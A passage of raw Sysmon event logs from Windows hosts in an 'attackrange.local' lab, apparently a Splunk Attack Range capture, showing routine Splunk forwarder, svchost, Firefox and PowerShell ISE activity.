Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F3747C6BF270A92E72985FE29956CEFC,SHA256=6D88776CE6091F9421816738AEB11FC44388E143F2E04360E6A19CE82C901CAD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053530Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.600{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E8E7B8DCF5C174053142E637B9134C3D,SHA256=0052F08420EA8B0851DC97966EA1101E5E8DC6B158C838E20319E199CCAD3383,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053529Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.084{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7A6-60EB-D67D-00000000CF01}7368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053528Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053527Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053526Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053525Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053524Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7A6-60EB-D67D-00000000CF01}7368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053523Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.068{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7A6-60EB-D67D-00000000CF01}7368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053522Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:54.069{466BC892-F7A6-60EB-D67D-00000000CF01}7368C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001053532Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:55.602{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4E9CBD0DDC2AE7E69D216B6CECFA16E6,SHA256=08F3BFEB74CD95FC68C5729BB609D76C1526137D30E2D1AD2CE87404CCDC7838,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809862Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:54.352{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse3.133.117.249ec2-3-133-117-249.us-east-2.compute.amazonaws.com55844-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809861Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:55.393{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F59D29EAA1E75305444F5465C491C3F5,SHA256=6130CDAE42022FB4754CA2B676B08F71876E81136E819644975808D72EC68DFD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053531Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:55.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=836BE8723EF4C294DC2071B4CF862558,SHA256=DB25BA3D3B083EB42893D3C5401981A3CC0A3DBB3E7D68917040516A75A8ED06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053533Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:56.616{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BC0A164D64A2486C29F61276A1D56A8,SHA256=E3AD8000E683A26B23859B35919484D9DD648ED51AE7F83C55F1E021009457C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809863Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:56.440{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F170320D39EC9F1AD36D0999959BCC07,SHA256=F19FB39D613F01E65F132B9F30E05D93A54F679D67FCF3AF243E2CC77085C3DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053536Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:57.637{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AEDF16167CD0C8874DFD2C45B0122B2,SHA256=2D099BC04DDC70419D5E099923BEF216B65797E8B8402BD7FAD61C975FE7A67E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809865Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:56.292{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57427-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809864Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:57.456{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CC33C116BF8CDD3DD46C02C717CB3CCF,SHA256=E0AC55AB8B28264F71C29A103BC0FB52D96507F2D1E77FBC000E79400005AA85,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053535Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:48.616{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61927-false10.0.1.12-8000- 23542300x80000000000000001053534Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:57.273{466BC892-02BC-60E8-2A00-00000000CF01}2928NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=DD4D1D185AB4AED8A391DDEB7814ED87,SHA256=CA570F672172721E4189F1D4FCAE899B45A155271730C13B6A88FE6BC47AB312,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809866Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:58.487{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BECD19200AA4D16AD42C8CF4F378514D,SHA256=9E85F6354EEE6B474FCEEEC541FDA75C15EDB79E7094458E41375B9516E30476,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053538Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:58.655{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3088FD828FC62AF2A1F7A174D03817A,SHA256=E8F9DA6C6ACE854257F903C889EE3636B21E2468BB36F7651B242C58EE9D4E80,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053537Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:58.240{466BC892-5A42-60E8-C510-00000000CF01}7816ATTACKRANGE\bobC:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exeC:\Users\bob\AppData\Local\Microsoft_Corporation\powershell_ise.exe_StrongName_lw2v2vm3wmtzzpebq33gybmeoxukb04w\3.0.0.0\AutoSaveInformation\7816.xml~RFf74ee8c.TMPMD5=4553D3891EC8198EC956E59A7FA89664,SHA256=7DA31B28073EC76DCCA7EDFC3709014058FE36DCB6626D30538493EE344D57A6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053540Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:59.670{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C743F84F531B7C5335C56955A14E145B,SHA256=F21227027A979A855C898A6B01D293B7734C2E65384BDE949CA129A04633109E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809867Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:04:59.488{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A52D9B1C0D429DBAB7CB8F0EED6A7F6F,SHA256=9C677FEF40D8C27586DD29E6D88C915008631DA5A0D8D2529F73CD46546EF5A4,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001053539Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:04:50.803{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local61928-false10.0.1.12-8089- 10341000x80000000000000001053546Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+1549f7|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053545Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+154962|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053544Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f 10341000x80000000000000001053543Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}89449164C:\Program Files\Mozilla Firefox\firefox.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+154947|C:\Windows\System32\windows.storage.dll+154323|C:\Windows\System32\windows.storage.dll+1541a9|C:\Windows\System32\windows.storage.dll+27be5|C:\Windows\System32\windows.storage.dll+27b2d|C:\Windows\System32\windows.storage.dll+26076|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336 23542300x80000000000000001053542Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.717{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFf74f831.TMPMD5=FEEDDF0B48ACBAE2DF2C13E094BA61E1,SHA256=564E4AC53FEF38F8EC2ADC3773CA3AE2E546D9CF626CDED40CA8B8DCCA4D789B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053541Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:00.671{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76BBFF0C527BEAFDB8D53B66CF8FF4D2,SHA256=C55B0AADEC8F98B44D68F47FFF932813E4CCF3DA320A21BE6E03CA49121C2F01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809870Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:00.533{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9E2256FD6CB034776A71AED3794DCA3A,SHA256=434F9726CFA2E99655A7604D7FCE83BF0325DC5E7AE8CC3A2B5E20499D20608F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809869Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:00.033{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FE337B53E89D473AA36828EEBAB82E1B,SHA256=14A5E6E7C9BC659B620675FB3DFE9701CAE90876213A089DC9AE1EBA3396B246,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809868Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:00.033{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D8761821C944218C34A864EACE2D55A4,SHA256=0759E34E22F08CD83D703DBE3D070878CEA7FF861B8B53B88EE492F769560407,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053549Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:01.700{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE8C585BAA061E28CF15AA1390C74678,SHA256=3C348A73536380282EB35B5D66ACAC3A35464A4E8FCC2A0B880C2F0C7CEEA649,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809871Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:01.550{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0715611458BD28CD576034A5C2B40D06,SHA256=BBE92A552479FD481821D543892A6F60CB06E1D413B4337EFCBB9A141A1F3093,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053548Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:01.669{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053547Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:01.669{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 